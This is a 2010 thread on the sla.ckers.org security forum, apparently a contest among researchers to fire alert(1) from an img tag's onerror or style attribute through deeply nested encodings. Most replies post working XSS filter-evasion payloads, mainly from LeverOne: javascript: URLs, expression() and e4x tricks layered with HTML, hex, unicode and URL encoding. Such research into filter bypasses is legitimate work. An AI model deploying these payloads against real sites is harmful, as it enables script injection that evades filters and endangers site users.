Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
YAUC Encode me baby one more time!
Posted by: Anonymous User
Date: February 11, 2010 10:35AM

Hey all!

Gareth and me were having another fuzzing session today and were thinking about a new contest. It's about time :) So - to not waste any words here's the rules:

* You have some HTML as a workbench
* To be precise - it's <img onerror="your input" src="x">
* Or <img style="your input" src="x"> in case you prefer - it's up to you!

* The task: Get an alert(1) to be executed
* The problem: You have to use n-times encoded data

* Some examples:
* &#61lert(1) is good
* location='javascript:&#x25;61lert(1)' is better

* You know what we mean? Encode the data as often as possible
* The higher the n in n-times the better
* We have examples with triple and quadruple encoding - can you do more?
* Rules: no unescape(), decodeURI(), decodeURIComponent(), eval() and comparable

The winner will be who encoded the data more times than everybody else - of found a way to encode the data n times (n=Infinity)

Here's a full example using double encoding (n=2 - pretty lame but valid):
<img onerror="location='javascript:&#x25;61lert(1)'" src="x">



Edited 5 time(s). Last edit at 02/13/2010 09:54AM by .mario.

Options: ReplyQuote
Re: YAUC Encode me baby one more time!
Posted by: LeverOne
Date: February 11, 2010 08:35PM

// n = 3
<img onerror="location='javascript:&#92x2561lert(1)'" src="x">

// n = 4
<img src="x" onerror="location='javascript:&#92x255Cu0061lert(1)'">

//IE only, n = 5
<img style="lol:location='javascript:&#92;00005Cx255Cu0061lert(1)',style.lol=null;lo:expression(eval(style.lol))" src="x">

//FF only, n=5
<img src="x" onerror="location.hash='#0=[];&#92x25255Cu0061lert(1)'; location = 'javascript:' + location.hash">

// Opera & IE6, n = 5

<img src=x  onerror="a=this;location='javascript:a.onerror=null,a.src=\'javascript:&#x5Cx255Cx2561lert(1)\';void(0)'">

// IE6 only, n = 6

<img style="background:url('javascript:location='javascript:&#92;0000255Cx255Cu0061lert(1)'');" src="x">

I assume that constructions with "innerHTML" is not allowed?

//FF only, n -> Infinity (url-encoding [25252525]))
<img src="x" onerror="try {eval('&#92x252525252525252525255Cu0061lert(1)')} catch(e) {location = 'javascript:' + this.onerror+'; onerror(); '}">

Quote
thornmaker
n = infinity is pretty easy
exactly!


upd: added one encoding (dec html in e4x-string)

// FF only, n = 6

<img src="x" onerror="location.hash='#0=[];&#x5Cx252526#92;u0061lert(1)'; location='javascript:location=<>javascript:'+location.hash+'</>+[];void(0)'">


LeverOne



Edited 5 time(s). Last edit at 03/01/2010 06:58PM by LeverOne.

Options: ReplyQuote
Re: YAUC Encode me baby one more time!
Posted by: thornmaker
Date: February 11, 2010 10:01PM

@leverone haha, nice.

n = infinity is pretty easy with loops and eval....

Options: ReplyQuote
Re: YAUC Encode me baby one more time!
Posted by: sirdarckcat
Date: February 12, 2010 05:12PM

I think they mean nested encoding.

example:

location='javascript:/<iframe src=data:x;charset=UTF-7;base64,crazy-stuff-here-doing-crazy-stuff-in-html-as-css>/'

so, if I asume correctly, that one would be doing: htmlencoding+encoding inside string+encoding inside regex+encoding as url+encoding as base64+encoding as utf-7+encoding as html+encoding as css+encoding as string=9

then, doing it infinite, is well.. too easy, just repeat 1 encoding and that's it.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: YAUC Encode me baby one more time!
Posted by: Anonymous User
Date: February 13, 2010 09:53AM

Hehe - nice ones LeverOne! And yep - originally we meant to not use the same encoding all over again/eval loops. So the IE6 one is perfectly valid while the last one isn't. Still awesome :)

Options: ReplyQuote


Sorry, only registered users may post in this forum.